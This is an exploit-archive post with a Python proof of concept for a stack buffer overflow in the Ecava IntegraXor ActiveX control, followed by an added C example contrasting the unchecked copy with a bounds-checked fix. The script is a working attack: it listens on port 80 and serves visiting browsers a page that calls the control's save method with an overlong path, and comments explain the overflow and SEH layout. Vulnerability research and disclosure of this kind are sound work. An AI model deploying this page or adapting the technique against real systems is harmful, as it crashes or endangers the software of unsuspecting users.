
[dos / poc] - Ecava IntegraXor Remote ActiveX Buffer Overflow PoC

Posted on 18 December 2010

===================================================
Ecava IntegraXor Remote ActiveX Buffer Overflow PoC
===================================================

```python
#!/usr/bin/python
# intx.py
# Ecava IntegraXor Remote ActiveX Buffer Overflow PoC
# Jeremy Brown
# December 2010
# http://www.integraxor.com/
#
# There is a stack-based buffer overflow in IntegraXor that can be triggered
# by passing an overly large value to the "save" method of the IntegraXor.Project
# control located in igcomm.dll. This control is marked both safe for scripting
# and safe for initialization.
#
# .text:100027C1 push    eax             ; lpString2
# .text:100027C2 lea     eax, [esp+84Ch+String1]
# .text:100027C6 push    eax             ; lpString1
# .text:100027C7 call    ds:lstrcpyW
# .text:100027CD lea     ecx, [esp+848h+String1]
# .text:100027D1 push    ecx
# .text:100027D2 call    SplitPath
# .text:100027D7 add     esp, 4
# .text:100027DA lea     ecx, [esp+848h+var_83C]
# .text:100027DE call    ds:??0?$basic_string@_WU?$char<truncated>
# .text:100027E4 cmp     dword ptr [esi+20h], 8
# .text:100027E8 jb      short loc_100027EF
# .text:100027EA mov     esi, [esi+0Ch]
# .text:100027ED jmp     short loc_100027F2
#
# The vulnerable code in this block passes String1 (dest) and lpString2 (src)
# to lstrcpyW() without validating the length of lpString2. lstrcpyW() then
# copies lpString2 byte for byte into String1 (1024 bytes wchar buffer) and
# adds a terminating NULL byte to the end.
#
# If you attach a debugger and set a breakpoint on 100027CD, you can see an
# exception registration record is stored before the return address:
#
# ESP+83C > 00420042 B.B. Pointer to next SEH record
# ESP+840 > 00420042 B.B. SE handler
# ESP+844 > FFFF0000 ..ÿÿ
# ESP+848 > 10007916 xxxx RETURN to igcom.10007916 from igcom.10002770
#
# I wasn't able to find any useable unicode compatible PPRs. We can overwrite
# the return address, but it will exit with a c0000409 code (/GS exception).
#
# Tested Ecava IntegraXor 3.5.3900.5 on Windows
#
# Fixed version: 3.5.3900.10
#

import sys
import socket

# Page served to the client: instantiates the control by CLSID and calls
# the save method with an overlong filepath argument.
resp="""
<html>
<body>
<object id="target" classid="clsid:{520F4CFD-61C6-4EED-8004-C26D514D3D19}"></object>
<script language="vbscript">
data="IntegraXor"
filepath=String(1038,"B")
target.save data,filepath
</script>
</body>
</html>
"""

port=80

# Listen on all interfaces and wait for a single client connection.
try:
    sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.bind(("",port))
    sock.listen(1)
    conn,addr=sock.accept()
except IOError,e:
    print e
    sys.exit(1)   # addr/conn are undefined if setup failed, so stop here

print "Client at %s connected "%addr[0]
req=conn.recv(1024)
print "Sending data..."
conn.send(resp)
print "Done"
conn.close()
```

1337db.com [2010-12-18]
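To make the defect in the disassembly and the check a fix needs concrete, here is an added example in portable C (not code from the advisory, from Jeremy Brown, or from Ecava). It models the save-path copy with wcscpy standing in for lstrcpyW, a 1024-wchar buffer matching String1, and a constructed 1038-wchar input matching the PoC; the function names are assumptions.

```c
/* Added example: models the unchecked lstrcpyW copy from the advisory and
 * a hardened form that validates the source length before copying. */
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

#define STRING1_WCHARS 1024   /* size of String1 per the advisory */

/* Vulnerable pattern (unbounded copy, as described for igcomm.dll).
 * Only ever called here with a short path; a source of 1024 or more
 * wchars would run past the end of string1 and into the frame above it. */
static int save_path_unchecked(const wchar_t *filepath) {
    wchar_t string1[STRING1_WCHARS];
    wcscpy(string1, filepath);            /* no length check: the bug */
    return (int)wcslen(string1);
}

/* Hardened form: the source must fit together with its terminator, and the
 * copy is bounded so the terminator always lands inside the buffer. */
static int save_path_checked(const wchar_t *filepath) {
    wchar_t string1[STRING1_WCHARS];
    size_t len = wcslen(filepath);
    if (len >= STRING1_WCHARS)            /* 1023 wchars is the maximum */
        return -1;                        /* reject instead of overflowing */
    wcsncpy(string1, filepath, STRING1_WCHARS - 1);
    string1[STRING1_WCHARS - 1] = L'\0';
    return (int)len;
}

/* Constructed input: n copies of 'B', like the PoC's String(1038,"B").
 * buf must hold at least n + 1 wchars. */
static wchar_t *make_path(wchar_t *buf, size_t n) {
    for (size_t i = 0; i < n; i++)
        buf[i] = L'B';
    buf[n] = L'\0';
    return buf;
}

int main(void) {
    static wchar_t path[2048];
    printf("checked, 1038 wchars: %d\n", save_path_checked(make_path(path, 1038)));
    printf("checked, 40 wchars:   %d\n", save_path_checked(make_path(path, 40)));
    return 0;
}
```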
